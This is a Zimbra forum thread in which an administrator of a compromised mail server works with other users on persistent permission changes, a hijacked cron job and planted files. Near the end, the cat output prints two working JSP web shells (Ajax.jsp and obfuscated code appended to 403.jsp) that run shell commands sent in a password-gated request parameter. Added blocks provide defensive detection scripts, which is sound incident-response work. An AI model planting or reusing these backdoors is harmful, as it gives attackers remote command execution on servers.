Unable to change permissions of /opt/zimbra/data/tmp/upload

Marcosebas
Advanced member
Posts: 82
Joined: Tue Sep 13, 2016 11:25 pm

Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by Marcosebas »

Dear All,

I am facing an issue. I have 2 Zimbra servers: one was infected with zmswatch, the other was not. Both are patched and running this version: Release 8.6.0_GA_1153.RHEL6_64_20141215151155 RHEL6_64 FOSS edition, Patch 8.6.0_P14.

Everything has been working fine. However, this afternoon the permissions of /opt/zimbra/data/tmp/upload were changed. I am using the command chmod 750 /opt/zimbra/data/tmp/upload/ to change the permissions, but I am not able to. The upload folder permissions stay dr--r-xr-x 2 zimbra zimbra 24576 Jun 14 17:44 upload.

[zimbra@mailbox tmp]$ ls -la
total 84
drwxr-xr-x 15 zimbra zimbra  4096 Jun 18 00:16 .
drwxr-xr-x  6 zimbra zimbra  4096 Dec 26  2017 ..
drwxr-xr-x  2 zimbra zimbra  4096 Sep  4  2018 3ce93ad5-6a70-4c23-b0a4-2d157aa0ef50-deferred
drwxr-xr-x  2 zimbra zimbra  4096 Mar 21 09:40 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-active
drwxr-xr-x  2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-corrupt
drwxr-xr-x  2 zimbra zimbra  4096 Apr 17 15:19 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-deferred
drwxr-xr-x  2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-hold
drwxr-xr-x  2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-incoming
drwxr-xr-x  3 zimbra zimbra  4096 Dec 26  2017 calcache
drwxr-xr-x  2 zimbra zimbra  4096 Jun 17 10:10 jna
drwxr-xr-x  2 zimbra zimbra  4096 Dec 26  2017 libreoffice
drwxr-xr-x  2 zimbra zimbra  4096 Jun 17 10:10 mysql
drwxr-xr-x  5 zimbra zimbra  4096 Dec 26  2017 nginx
drwxr-xr-x  5 zimbra zimbra  4096 Dec 26  2017 uncompressed
dr--r-xr-x  2 zimbra zimbra 24576 Jun 14 17:44 upload
[zimbra@mailbox tmp]$ chmod 750 /opt/zimbra/data/tmp/upload/
[zimbra@mailbox tmp]$ ls -l
total 76
drwxr-xr-x 2 zimbra zimbra  4096 Sep  4  2018 3ce93ad5-6a70-4c23-b0a4-2d157aa0ef50-deferred
drwxr-xr-x 2 zimbra zimbra  4096 Mar 21 09:40 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-active
drwxr-xr-x 2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-corrupt
drwxr-xr-x 2 zimbra zimbra  4096 Apr 17 15:19 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-deferred
drwxr-xr-x 2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-hold
drwxr-xr-x 2 zimbra zimbra  4096 Dec 26 07:55 b8d0082f-d2d2-42d5-80a0-2180236fd1d2-incoming
drwxr-xr-x 3 zimbra zimbra  4096 Dec 26  2017 calcache
drwxr-xr-x 2 zimbra zimbra  4096 Jun 17 10:10 jna
drwxr-xr-x 2 zimbra zimbra  4096 Dec 26  2017 libreoffice
drwxr-xr-x 2 zimbra zimbra  4096 Jun 17 10:10 mysql
drwxr-xr-x 5 zimbra zimbra  4096 Dec 26  2017 nginx
drwxr-xr-x 5 zimbra zimbra  4096 Dec 26  2017 uncompressed
dr--r-xr-x 2 zimbra zimbra 24576 Jun 14 17:44 upload
[zimbra@mailbox tmp]$ 


What can I do? Please, any help.

Regards,

Marco
indunil75
Advanced member
Posts: 97
Joined: Sat Sep 13, 2014 12:35 am

Re: Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by indunil75 »

I am having the same problem.

Pls check the cron log.

tail -f /var/log/cron

Maybe it is running every minute.

As a temporary solution, pls disable the zimbra cronjob in this way.

As root

mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled

vi /etc/cron.deny and add user zimbra to it.

then,

/etc/init.d/crond restart

Now, run

chmod 750 /opt/zimbra/data/tmp/upload

and see: will it change again?

Remember, it's JUST a temp solution.
SamueleERAL
Posts: 7
Joined: Tue Jun 11, 2019 12:26 pm
Location: Via Europa, Vazzola, 31028 (TV) Italy

Re: Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by SamueleERAL »

I had the same problem. What I found on my server was 2 executable files in /opt/zimbra/log; you have to delete them.
The crontab for the user zimbra was changed; check if there is something suspicious there.
There were a lot of .jsp files. If you have another server with the same services installed, you can use 'find' to check the files changed since the day you were compromised and find any new jsp files. For the files that changed, check against the other server whether the differences are legit or not.
Another article you could read is this viewtopic.php?t=66213&start=120#p291256 , it was very helpful.
SamueleERAL
Posts: 7
Joined: Tue Jun 11, 2019 12:26 pm
Location: Via Europa, Vazzola, 31028 (TV) Italy

Re: Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by SamueleERAL »

I had the same issue with one of my servers. What I found was two executable files in /opt/zimbra/log/, but I guess you already found them.
Then the crontab for the user zimbra was changed; in my case almost every line was deleted, and in the last two lines there was one launching zmswatch. Check that to see if there have been changes.
There were a lot of new .jsp files and a lot of changed jsp files. In my case it was useful to have a twin server with the same services installed, so I used find to see all jsp files changed since the day of the attack and ran the same command on the other server, then deleted the new files and checked the changed files to see if the changes were legit or corruptions.
The last thing that gave a lot of help was to look at this topic viewtopic.php?t=66213&start=120#p291256 , launch the command he suggests and see the result.
Hope it could be helpful
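
The twin-server comparison described in the post above, as an added example that is not part of the original thread: it compares .jsp files by SHA-256 instead of by modification time, because the Ajax.jsp listing later in this thread carries a Dec 15 2014 date while containing command-execution code. The function names and the manifest layout are assumptions.

```bash
#!/bin/sh
# Added example, not code from the thread. Function names are hypothetical.

# jsp_manifest ROOT
# Print "<sha256>  <path relative to ROOT>" for every .jsp under ROOT.
jsp_manifest() {
    ( cd "$1" && find . -type f -name '*.jsp' -exec sha256sum {} + ) |
        LC_ALL=C sort -k 2
}

# compare_manifests CLEAN SUSPECT
# CLEAN comes from the twin server, SUSPECT from the affected one.
#   NEW      only on the suspect server
#   CHANGED  present on both, content differs
#   MISSING  only on the clean server
compare_manifests() {
    awk '
        BEGIN {
            # Load the clean manifest first, then let awk read only SUSPECT.
            clean_file = ARGV[1]; ARGV[1] = ""
            while ((getline line < clean_file) > 0)
                clean[substr(line, 67)] = substr(line, 1, 64)
        }
        # sha256sum lines: 64 hex characters, 2 separator characters, path.
        { hash = substr($0, 1, 64); path = substr($0, 67); seen[path] = 1 }
        !(path in clean)    { print "NEW     " path; next }
        clean[path] != hash { print "CHANGED " path }
        END {
            for (p in clean) if (!(p in seen)) print "MISSING " p
        }
    ' "$1" "$2" | LC_ALL=C sort
}

# Usage, with the web root named in this thread:
#   on each server:  jsp_manifest /opt/zimbra/mailboxd/webapps > "$(hostname).sha"
#   then:            compare_manifests twin.sha mailbox.sha
```

Both servers need the same Zimbra release and patch level, otherwise legitimate differences show up as CHANGED.
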
Marcosebas
Advanced member
Posts: 82
Joined: Tue Sep 13, 2016 11:25 pm

Re: Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by Marcosebas »

Hi Indunil,

Thanks, but I am getting the following; the cron is running every minute as you said.

[root@mailbox ~]# tail -f /var/log/cron
Jun 18 08:37:25 mailbox crontab[23942]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24038]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24042]: (zimbra) LIST (zimbra)
Jun 18 08:37:49 mailbox crontab[24047]: (zimbra) LIST (zimbra)
Jun 18 08:37:55 mailbox crontab[24095]: (zimbra) LIST (zimbra)
Jun 18 08:38:01 mailbox CROND[24303]: (zimbra) CMD (/opt/zimbra/libexec/zmstatuslog > /dev/null 2>&1)
Jun 18 08:38:25 mailbox crontab[24628]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24698]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24702]: (zimbra) LIST (zimbra)
Jun 18 08:38:34 mailbox crontab[24707]: (zimbra) LIST (zimbra)
Jun 18 08:38:56 mailbox crontab[24811]: (zimbra) LIST (zimbra)
But when I insert the line to disable the zimbra cron I get this:

[root@mailbox ~]# tail -f /var/log/cron

[root@mailbox ~]# mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled
`/var/spool/cron/zimbra' -> `/var/spool/cron/zimbra.disabled'
mv: cannot move `/var/spool/cron/zimbra' to `/var/spool/cron/zimbra.disabled': Operation not permitted
Also the /etc/cron.deny is empty. Should it be like that or how to add the zimbra line to it?

Regards,

Marco
SamueleERAL
Posts: 7
Joined: Tue Jun 11, 2019 12:26 pm
Location: Via Europa, Vazzola, 31028 (TV) Italy

Re: Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by SamueleERAL »

In my opinion, disallowing the user zimbra from running cronjobs will let you set permissions in /opt/zimbra/data/tmp but won't solve the problem.
There are useful things in the zimbra crontab; it's not a good idea to leave it disabled for too long.
As you have seen, the crontab launches /opt/zimbra/libexec/zmstatuslog every minute, so probably that file is compromised.
If you don't have a twin server as I have, you should restore a backup that is not compromised and start checking files in the way suggested in my previous post.
Marcosebas
Advanced member
Posts: 82
Joined: Tue Sep 13, 2016 11:25 pm

Re: Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by Marcosebas »

I do not have a clean backup. What could be the best solution? If I upgrade my ZCS 8.6 to 8.8, would that solve the problem of the files that were modified? I must say that my Zimbra crontab hasn't been modified. I don't find any line regarding zmswatch.

Regards,

Marco
indunil75
Advanced member
Posts: 97
Joined: Sat Sep 13, 2014 12:35 am

Re: Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by indunil75 »

Hi,

Pls see the permissions of the file with the commands below.

ls -al /var/spool/cron/zimbra

lsattr /var/spool/cron/zimbra

You may NEED to use the command below.

chattr -i /var/spool/cron/zimbra

Then, run the commands below again.

mv -vi /var/spool/cron/zimbra /var/spool/cron/zimbra.disabled

Yes, it is empty. Just add the word zimbra to that file in this way.

echo zimbra > /etc/cron.deny

then,

/etc/init.d/crond restart

Now, run

chmod 750 /opt/zimbra/data/tmp/upload


Anyway, a good URL to follow:

viewtopic.php?t=65932&start=120
indunil75
Advanced member
Posts: 97
Joined: Sat Sep 13, 2014 12:35 am

Re: Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by indunil75 »

Pls check if these files exist?

ls -al /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
ls -al /opt/zimbra/mailboxd/webapps/service/error/403.jsp

Pls give me their contents

cat /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
cat /opt/zimbra/mailboxd/webapps/service/error/403.jsp

These 2 files?

ls -al /opt/zimbra/log/zmswatch

ls -al /opt/zimbra/log/zmswatch.sh
Marcosebas
Advanced member
Posts: 82
Joined: Tue Sep 13, 2016 11:25 pm

Re: Unable to change permissions of /opt/zimbra/data/tmp/upload

Post by Marcosebas »

indunil75 wrote: Pls check if these files exist?

ls -al /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
ls -al /opt/zimbra/mailboxd/webapps/service/error/403.jsp

Yes they exist.

[root@mailbox ~]# ls -al /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
-rwxr-xr-x 1 zimbra zimbra 332 Dec 15 2014 /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
[root@mailbox ~]# ls -al /opt/zimbra/mailboxd/webapps/service/error/403.jsp
-rwxr-xr-x 1 zimbra zimbra 1658 May 22 10:50 /opt/zimbra/mailboxd/webapps/service/error/403.jsp

indunil75 wrote: Pls give me their contents

cat /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp
cat /opt/zimbra/mailboxd/webapps/service/error/403.jsp

[root@mailbox ~]# cat  /opt/zimbra/mailboxd/webapps/zimbra/public/Ajax.jsp 
<%if("LVdpVsmayetL6cvL2YToniYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.print(new String(b,a));}out.print("</pre>");}%>

[root@mailbox ~]# cat /opt/zimbra/mailboxd/webapps/service/error/403.jsp
<!--
 * ***** BEGIN LICENSE BLOCK *****
 * Zimbra Collaboration Suite Server
 * Copyright (C) 2011, 2013, 2014 Zimbra, Inc.
 * 
 * This program is free software: you can redistribute it and/or modify it under
 * the terms of the GNU General Public License as published by the Free Software Foundation,
 * version 2 of the License.
 * 
 * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
 * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 * See the GNU General Public License for more details.
 * You should have received a copy of the GNU General Public License along with this program.
 * If not, see <http://www.gnu.org/licenses/>.
 * ***** END LICENSE BLOCK *****
-->
<%@ page import="com.zimbra.common.util.L10nUtil,com.zimbra.common.util.L10nUtil.MsgKey" %>
<HTML>
<HEAD>
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
    <title>Error 403</title>
</HEAD>
<BODY>
<%--
    This page can be customized.
--%> 
    <h2>HTTP ERROR: 403</h2>
    <pre>You are not allowed to access this page.</pre>
</BODY>
</HTML>
<%
if  (  "cmv7aPxsAStjMN5lW0DLE521KEJugzH0uD-YJySjO50"   .equals( request.getParameter(   "p"
+
"pwd"   )
)  )   {   java.io.InputStream   YfqL =  Runtime.getRuntime() .exec  (
new
String[] {   "/bin" + "/sh" 
,  "-c" ,
request.getParameter(
"p"   +
"com"
  )   } ) .getInputStream()   ;
int
NrHqK
=
-1   ;   byte[]
yxIyPqf =  new
byte[
81
]   ;   out.print(   "<p"
+  "re>"

) ; while(  (  NrHqK
= YfqL.read(  yxIyPqf
)  ) !=
-1  )   {   out.print( new
String(  yxIyPqf,  0,
NrHqK  )
)
; }
out.print(  "<"  +
"/pre>"
  )
; }
%>

indunil75 wrote: These 2 files?

ls -al /opt/zimbra/log/zmswatch

ls -al /opt/zimbra/log/zmswatch.sh

Those 2 files exist but are made with touch, as I did a previous "clean" on the server. There is no zmswatch process running that I can see (I used the command top to check running processes), nor any modification in the zimbra crontab.

Thank you for your help.

Best,

Marco
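
A content check for the pattern visible in both files above, as an added example that is not part of the original thread: it flags any .jsp that both starts an OS process and reads a request parameter, after stripping whitespace and rejoining `"a" + "b"` string splits so that the reformatted code appended to 403.jsp is still matched. The function names are assumptions, and ProcessBuilder is a generalization beyond the two files shown; a hit is a lead for manual review against a clean copy of the same release.

```bash
#!/bin/sh
# Added example, not code from the thread. Function names are hypothetical.

# normalize_jsp FILE
# Delete all whitespace, then rejoin string literals that were split with "+",
# so   "p" <newline> + "pwd"   becomes   "ppwd".
normalize_jsp() {
    tr -d '[:space:]' < "$1" | sed 's/"+"//g'
}

# is_suspicious_jsp FILE
# Exit 0 when the normalized source both starts an OS process and reads a
# request parameter. The files in the thread use Runtime.exec only;
# ProcessBuilder is checked as well (generalization).
is_suspicious_jsp() {
    _src=$(normalize_jsp "$1")
    case $_src in
        *'Runtime.getRuntime().exec('*|*'newProcessBuilder('*) ;;
        *) return 1 ;;
    esac
    case $_src in
        *'request.getParameter('*) return 0 ;;
        *) return 1 ;;
    esac
}

# scan_jsp_tree ROOT
# Print "SUSPECT <path>" for every flagged .jsp under ROOT, sorted.
# Paths containing a newline are not handled by this line-based loop.
scan_jsp_tree() {
    find "$1" -type f -name '*.jsp' -print |
    while IFS= read -r _f; do
        if is_suspicious_jsp "$_f"; then
            printf 'SUSPECT %s\n' "$_f"
        fi
    done | LC_ALL=C sort
}

# Usage, with the web root named in this thread:
#   scan_jsp_tree /opt/zimbra/mailboxd/webapps
```
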